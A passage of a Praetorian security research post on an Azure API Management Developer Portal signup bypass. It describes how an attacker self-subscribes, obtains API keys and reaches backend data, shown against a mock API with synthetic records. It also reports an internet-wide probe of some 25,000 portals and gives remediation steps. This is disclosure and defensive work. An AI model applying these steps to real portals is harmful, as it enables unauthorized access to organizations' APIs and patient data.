</div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0b8f379 e-con-full e-flex e-con e-parent" data-id="0b8f379" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-49ca69a elementor-widget elementor-widget-text-editor" data-id="49ca69a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Email invitation received after successful anonymous self-signup to the target Azure APIM Developer Portal</p> <p><em>Email invitation after successful self-sign-up</em></p> <p>The backend processes the request without validating the tenant of origin. The account is created in the target’s APIM instance. The attacker receives a confirmation email and can now log in.</p> <p><a id="Xadf1d2eff9fa4ebf9c1108a4310cd6aad77b8f3"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-189e3a5 e-con-full e-flex e-con e-parent" data-id="189e3a5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2da9547 elementor-widget elementor-widget-heading" data-id="2da9547" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 4: Authenticate, subscribe to a product, and obtain an API key.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5cdc911 e-con-full e-flex e-con e-parent" data-id="5cdc911" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8c6fd2b elementor-widget elementor-widget-text-editor" data-id="8c6fd2b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The default Starter product ships with approvalRequired: false. The attacker self-subscribes using a PUT request to the management API. No administrator approval is needed:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a3ba61d e-con-full e-flex e-con e-parent" data-id="a3ba61d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-001045d elementor-widget elementor-widget-image" data-id="001045d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp" class="attachment-full size-full wp-image-10956" alt="Terminal showing curl command making API call to Azure Management API with Basic authentication, returning HTTP 200 response with JSON ID" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Attacker can authenticate as a Developer to the APIM developer portal</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c7ad55d e-con-full e-flex e-con e-parent" data-id="c7ad55d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fdd9af9 elementor-widget elementor-widget-image" data-id="fdd9af9" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="324" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp" class="attachment-full size-full wp-image-10957" alt="Terminal window showing curl command creating Azure subscription with PUT request, displaying HTTP 201 response with JSON data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-768x259.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Self-subscribe PUT request to Starter product returns 201 Created</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e719eab e-con-full e-flex e-con e-parent" data-id="e719eab" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-37ec580 elementor-widget elementor-widget-image" data-id="37ec580" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="344" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp" class="attachment-full size-full wp-image-10958" alt="Terminal window showing curl command to Azure API with HTTP 200 response containing primaryKey and secondaryKey JSON values" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-300x108.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-768x275.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">listSecrets response containing primary and secondary API keys</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f9154a e-con-full e-flex e-con e-parent" data-id="9f9154a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7e3c937 elementor-widget elementor-widget-image" data-id="7e3c937" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1332" height="621" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp" class="attachment-full size-full wp-image-10959" alt="Email from Praetorian Research welcoming Elgin Lee to Starter subscription, showing start date 3/13/2026 and API usage details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp 1332w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-300x140.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-1024x477.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-768x358.webp 768w" sizes="auto, (max-width: 1332px) 100vw, 1332px"><figcaption class="widget-image-caption wp-caption-text">Confirmation email of a successful subscription to Starter</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-158a6cb e-con-full e-flex e-con e-parent" data-id="158a6cb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a1c780 elementor-widget elementor-widget-heading" data-id="4a1c780" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 5: Call backend APIs.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0df09b6 e-con-full e-flex e-con e-parent" data-id="0df09b6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0186939 elementor-widget elementor-widget-text-editor" data-id="0186939" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>With a valid subscription key, the attacker makes authenticated API calls through the APIM gateway:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-eb3b039 e-con-full e-flex e-con e-parent" data-id="eb3b039" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae5d147 elementor-widget elementor-widget-image" data-id="ae5d147" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp" class="attachment-full size-full wp-image-10960" alt="Terminal window showing curl command to medical device API returning HTTP 200 response with JSON data showing total patient count of 12847" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient count API returns 12,847 records accessible</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5b0bd8c e-con-full e-flex e-con e-parent" data-id="5b0bd8c" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-efe2d1c elementor-widget elementor-widget-image" data-id="efe2d1c" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="1224" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp" class="attachment-full size-full wp-image-10961" alt="Terminal window showing JSON response from medical API with patient records including names, diagnoses, and physician details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-235x300.webp 235w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-803x1024.webp 803w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-768x979.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0881ea2 e-con-full e-flex e-con e-parent" data-id="0881ea2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-52e168d elementor-widget elementor-widget-text-editor" data-id="52e168d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Simulated patient health records returned via APIM API showing MRNs, names, dates of birth, diagnoses, and insurance IDs from synthetic test data</p> <p><em>Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</em></p> <p>From anonymous internet access to patient health records and IoT device authentication tokens. Five steps, no credentials, no prior access to the target organization.</p> <p><a id="X3b0c89f01e5f0b95d7d85b6baf4140534fa4076"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-196f374 e-con-full e-flex e-con e-parent" data-id="196f374" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-28773d4 elementor-widget elementor-widget-heading" data-id="28773d4" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Impact Spectrum: From Noise to Critical Data Exposure</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a0ecf3b e-con-full e-flex e-con e-parent" data-id="a0ecf3b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bd4c3aa elementor-widget elementor-widget-text-editor" data-id="bd4c3aa" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Not every exploitable instance carries the same risk. The Azure APIM signup bypass is the common entry point, but the severity depends on what the organization has placed behind its Developer Portal. We configured three tiers of APIM instances to illustrate the range.</p> <p><a id="the-exploitability-matrix"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4e77759 e-con-full e-flex e-con e-parent" data-id="4e77759" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5ec516e elementor-widget elementor-widget-heading" data-id="5ec516e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Exploitability Matrix</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0880218 e-con-full e-flex e-con e-parent" data-id="0880218" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a550547 elementor-widget elementor-widget-text-editor" data-id="a550547" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4c7cf49 e-con-full e-flex e-con e-parent" data-id="4c7cf49" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8cdd448 elementor-widget elementor-widget-image" data-id="8cdd448" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1768" height="1254" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp" class="attachment-full size-full wp-image-10962" alt="Flowchart showing security risk paths from cross-tenant signup through subscription decisions to final risk outcomes" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp 1768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-300x213.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1024x726.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-768x545.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1536x1089.webp 1536w" sizes="auto, (max-width: 1768px) 100vw, 1768px"><figcaption class="widget-image-caption wp-caption-text">Exploitability decision tree showing impact tiers based on product configuration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b7518ed e-con-full e-flex e-con e-parent" data-id="b7518ed" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-271b93e elementor-widget elementor-widget-heading" data-id="271b93e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">At Scale: 25,000+ Developer Portals Exposed</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aadbc6f e-con-full e-flex e-con e-parent" data-id="aadbc6f" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b31aeb1 elementor-widget elementor-widget-text-editor" data-id="b31aeb1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The original advisory demonstrated the vulnerability against individual instances. We assessed the scope: how many Azure APIM Developer Portals are internet-facing, and how many are likely vulnerable?</p> <p><a id="methodology"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cee4eb4 e-con-full e-flex e-con e-parent" data-id="cee4eb4" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5185086 elementor-widget elementor-widget-heading" data-id="5185086" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Methodology</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30f55b3 e-con-full e-flex e-con e-parent" data-id="30f55b3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9575057 elementor-widget elementor-widget-text-editor" data-id="9575057" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We queried Shodan for all hosts matching hostname:developer.azure-api.net, which returned <strong>69,248 matching banners</strong> for individual port/service observations across internet-facing APIM infrastructure. After deduplication, we identified <strong>25,379 unique APIM Developer Portal instances</strong>. We used this as our sample set for heuristic analysis.</p> <p><strong>Limitation:</strong> This search only identifies portals using the default *.developer.azure-api.net hostname. Organizations that configure custom domains (e.g., developers.contoso.com with a CNAME to Azure APIM) are not captured. Azure uses a single wildcard TLS certificate for all APIM portals, so Certificate Transparency logs do not reveal individual instance names.</p> <p><a id="X41aea7440729aec4e61385a47baf1e16fde56eb"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9ac8b5e e-con-full e-flex e-con e-parent" data-id="9ac8b5e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a7698e elementor-widget elementor-widget-heading" data-id="4a7698e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Heuristic Analysis: Estimating Vulnerability at Scale</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f694220 e-con-full e-flex e-con e-parent" data-id="f694220" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ecae6c elementor-widget elementor-widget-text-editor" data-id="4ecae6c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We designed a non-invasive heuristic probe to classify instances without triggering any signup flow or creating any accounts on third-party infrastructure.</p> <p>Our approach: send a POST /signup request with an empty JSON body ({}), no email, password, CAPTCHA, or PII, to every instance. This request cannot create an account and does not complete any step of the signup flow. The probe classifies responses based on error message content: an HTTP 400 containing “ValidationError,” “captcha,” or “challenge” indicates the signup endpoint is active and consistent with an enabled Basic Auth provider; an HTTP 404 indicates the signup endpoint does not exist. These are heuristic-based estimates, not confirmed exploits.</p> <p>Even accounting for the margin of error, <strong>the vast majority of internet-facing APIM Developer Portals, on the order of 23,000 to 25,000 instances, show responses consistent with an active Basic Auth signup endpoint.</strong> Only 51 instances returned HTTP 404 on /signup, indicating the Basic Auth provider has been explicitly removed.</p> <p><a id="what-this-means"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-234047d e-con-full e-flex e-con e-parent" data-id="234047d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-87f8e55 elementor-widget elementor-widget-heading" data-id="87f8e55" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">What This Means</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6ba5a4e e-con-full e-flex e-con e-parent" data-id="6ba5a4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1e94cea elementor-widget elementor-widget-text-editor" data-id="1e94cea" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Four months after Haatainen’s public disclosure, the data suggests that very few organizations have taken the remediation step of removing the Basic Auth provider. Because MSRC classified this as “by design,” there was no security advisory or automated patch to drive remediation. Organizations that use the “disable signup” toggle as their primary control may not realize that the Azure APIM signup bypass remains exploitable and that additional action is required.</p> <p><a id="remediation-closing-the-gap"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-52536c2 e-con-full e-flex e-con e-parent" data-id="52536c2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-e870a2a elementor-widget elementor-widget-heading" data-id="e870a2a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Remediation: Closing the Gap</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-64645fb e-con-full e-flex e-con e-parent" data-id="64645fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fd6ecc4 elementor-widget elementor-widget-text-editor" data-id="fd6ecc4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Because MSRC has classified this behavior as “by design,” no patch or automated fix is forthcoming. Organizations running APIM need to take explicit action to close the signup endpoint. The fix is straightforward, but the Azure Portal’s “disable signup” toggle alone is not sufficient.</p> <p><a id="X56a8c51815d2afc6c4c811ac051689e6daa59df"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b00aaf8 e-con-full e-flex e-con e-parent" data-id="b00aaf8" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737a970 elementor-widget elementor-widget-heading" data-id="737a970" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">1. Delete the Basic Authentication identity provider entirely.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-073b3c5 e-con-full e-flex e-con e-parent" data-id="073b3c5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-638726d elementor-widget elementor-widget-text-editor" data-id="638726d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This is the only remediation that fully eliminates the attack surface. Removing the Basic Auth provider deactivates the /signup endpoint; there is no registration mechanism left for the attacker to target.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d8ef701 e-con-full e-flex e-con e-parent" data-id="d8ef701" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3be925b elementor-widget elementor-widget-image" data-id="3be925b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="164" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp" class="attachment-full size-full wp-image-10963" alt="Terminal window showing Azure CLI command to delete Basic Auth Provider from API Management service with subscription and resource group parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-768x131.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79a7fbe e-con-full e-flex e-con e-parent" data-id="79a7fbe" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2e121e6 elementor-widget elementor-widget-heading" data-id="2e121e6" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">2. Switch to Azure AD (Entra ID) as the sole identity provider.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d41523e e-con-full e-flex e-con e-parent" data-id="d41523e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1a389e9 elementor-widget elementor-widget-text-editor" data-id="1a389e9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure AD authentication ties account creation to your organization’s directory. Cross-tenant signups are not possible because users must authenticate through your tenant’s identity system. This is the long-term architectural fix. Learn more about <a href="https://learn.microsoft.com/en-us/azure/api-management/api-management-howto-aad">configuring Azure AD as an identity provider for APIM</a>.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0e1caac e-con-full e-flex e-con e-parent" data-id="0e1caac" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1537899 elementor-widget elementor-widget-heading" data-id="1537899" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">3. Require admin approval for all product subscriptions.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dca0e3a e-con-full e-flex e-con e-parent" data-id="dca0e3a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f497d51 elementor-widget elementor-widget-text-editor" data-id="f497d51" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Even if you cannot immediately remove Basic Auth, setting approvalRequired: true on every product prevents attackers from self-subscribing and obtaining API keys. The attacker can create an account, but cannot obtain API keys without administrator approval.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f100636 e-con-full e-flex e-con e-parent" data-id="f100636" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b272011 elementor-widget elementor-widget-image" data-id="b272011" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="204" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp" class="attachment-full size-full wp-image-10964" alt="Terminal window showing Azure CLI command to set approval required on Starter product using PATCH method with JSON body" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-300x64.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-768x163.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-150642a e-con-full e-flex e-con e-parent" data-id="150642a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0342996 elementor-widget elementor-widget-heading" data-id="0342996" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">4. Audit existing developer portal accounts.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bfec1db e-con-full e-flex e-con e-parent" data-id="bfec1db" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ba1b348 elementor-widget elementor-widget-text-editor" data-id="ba1b348" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Look for accounts that were created after you “disabled” signup. Check for accounts using external email domains or accounts created via the Basic identity provider. Remove any unauthorized accounts and revoke their subscription keys.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8513f4e e-con-full e-flex e-con e-parent" data-id="8513f4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7a90143 elementor-widget elementor-widget-image" data-id="7a90143" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="244" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp" class="attachment-full size-full wp-image-10965" alt="Terminal window showing Azure CLI command to list developer portal users with Basic authentication, displaying API endpoint URL" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-300x76.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-768x195.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/azure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet/" data-a2a-title="Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save 